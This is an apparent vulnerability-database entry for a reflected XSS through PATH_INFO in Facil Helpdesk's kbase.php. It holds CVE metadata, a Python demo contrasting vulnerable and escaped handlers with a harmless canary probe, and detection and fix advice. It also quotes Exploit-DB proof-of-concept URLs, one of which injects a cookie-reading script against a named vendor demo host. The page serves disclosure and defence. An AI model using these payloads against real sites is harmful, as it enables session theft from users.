CVE-2009-4544
Published: 2010-01-04
Priority: P4 (19) · Severity: medium · CVSS 2.0 base score: 4.3 · Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N
Exploit: public (Exploit-DB entries below)
EPSS: 1.55% (72.1st percentile)
Cross-site scripting (XSS) vulnerability in kbase/kbase.php in Cromosoft Technologies Facil Helpdesk 2.3 Lite allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.
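The PATH_INFO reflection described above, as an added example that is not Facil Helpdesk's code: two small WSGI handlers stand in for the vulnerable and a hardened kbase.php (the real PHP is not on this page, so the page layout, a self-link built from PATH_INFO, is assumed), a server shim splits SCRIPT_NAME from PATH_INFO and URL-decodes the trailing part the way Apache does for `/kbase/kbase.php/<extra>`, and a probe builds the canary URL and classifies the response as unescaped reflection, escaped reflection, or no reflection. The canary string and the `127.0.0.1` base URL are constructed for the example.

```python
"""Reflected XSS through PATH_INFO, modelled on the kbase/kbase.php issue.

Illustration only: the two WSGI apps below are stand-ins for the vulnerable
and a hardened handler, not Facil Helpdesk's PHP. The page layout, the host
and the canary string are assumptions made for this example.
"""
import html
from urllib.parse import quote, unquote, urlsplit

SCRIPT = "/kbase/kbase.php"
# Constructed canary: a quote and angle brackets, so it only survives intact
# when the application writes it into HTML without escaping.
CANARY = 'x"><zz7q>'


def vulnerable_app(environ, start_response):
    """Builds a self-link from PATH_INFO without escaping (assumed pattern)."""
    extra = environ.get("PATH_INFO", "")
    body = f'<html><body><a href="{SCRIPT}{extra}">Knowledge base</a></body></html>'
    start_response("200 OK", [("Content-Type", "text/html")])
    return [body.encode()]


def hardened_app(environ, start_response):
    """Same page, but PATH_INFO is HTML-escaped before it reaches the markup."""
    extra = html.escape(environ.get("PATH_INFO", ""), quote=True)
    body = f'<html><body><a href="{SCRIPT}{extra}">Knowledge base</a></body></html>'
    start_response("200 OK", [("Content-Type", "text/html")])
    return [body.encode()]


def serve(app, request_path):
    """Server shim: split SCRIPT_NAME from PATH_INFO at kbase.php and URL-decode
    the trailing part, as Apache does for /kbase/kbase.php/<extra>."""
    if not request_path.startswith(SCRIPT):
        raise ValueError("not a kbase.php request")
    environ = {
        "REQUEST_METHOD": "GET",
        "SCRIPT_NAME": SCRIPT,
        "PATH_INFO": unquote(request_path[len(SCRIPT):]),
    }
    status = []
    body = app(environ, lambda s, h: status.append(s))
    return status[0], b"".join(body).decode()


def build_probe_url(base, canary=CANARY):
    """Put the canary after kbase.php as path info, percent-encoded for transport."""
    return f"{base}{SCRIPT}/{quote(canary, safe='')}"


def classify(body, canary=CANARY):
    """Scanner-style verdict on a response body."""
    if canary in body:
        return "reflected-unescaped"      # exploitable: markup survived
    if html.escape(canary, quote=True) in body:
        return "reflected-escaped"        # reflected, but neutralised
    return "not-reflected"


def probe(app, base="http://127.0.0.1"):
    """Request the probe URL against the app and classify what comes back."""
    path = urlsplit(build_probe_url(base)).path
    status, body = serve(app, path)
    return classify(body)


if __name__ == "__main__":
    for name, app in (("vulnerable", vulnerable_app), ("hardened", hardened_app)):
        print(f"{name}: {probe(app)}")
```

The point of the shim is that the payload never travels in the query string: the server decodes it into PATH_INFO, so filters, WAF rules and log searches keyed on `?name=value` parameters miss it. The matching detection is to look at the decoded request path for `"`, `<` or `>` (or their `%22`, `%3C`, `%3E` encodings) after `kbase.php/`, and the fix is to escape or allow-list the value before it is written into markup.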
Affected (1 range):
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cromosoft | facil_helpdesk | — | — |
No detection rules found.
Exploit-DB (2009-08-07): Facil Helpdesk - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting
---
/*
Evil Team

Facil Helpdesk (RFI/LFI/XSS) Multiple Vulnerabilities
Discovered By : Moudi
Contact :
Download : http://www.cromosoft.com/en/facilhelpdesk.html
Greetings : Mizoz, Zuka, str0ke, 599eme Man.
*/
[+] Exploit XSS:
- Vulnerable code in kbase.php (/).
- PoC:
http://127.0.0.1/kbase.php/[XSS]
http://www.demo.cromosoft.com/helpdesk/kbase/kbase.php/"><script>alert(document.cookie);</script>
[+] Exploit LFI:
- Vulnerable code in index.php (lng).
- PoC:
http://
Exploit-DB (2009-08-07): Facil Helpdesk - 'kbase/kbase.php' URI Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/42528/info
Facil Helpdesk is prone to multiple input-validation vulnerabilities, including a cross-site scripting vulnerability, a local file-include vulnerability, and a remote file-include vulnerability.
An attacker can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, obtain potentially sensitive information, execute local script code in the context of the application, or execute arbitrary code within the context of the webserver process; other attacks are also possible.
Facil Helpdesk 2.3 Lite is vulnerable; other versions may also be affected.
htt
No writeups or analysis indexed.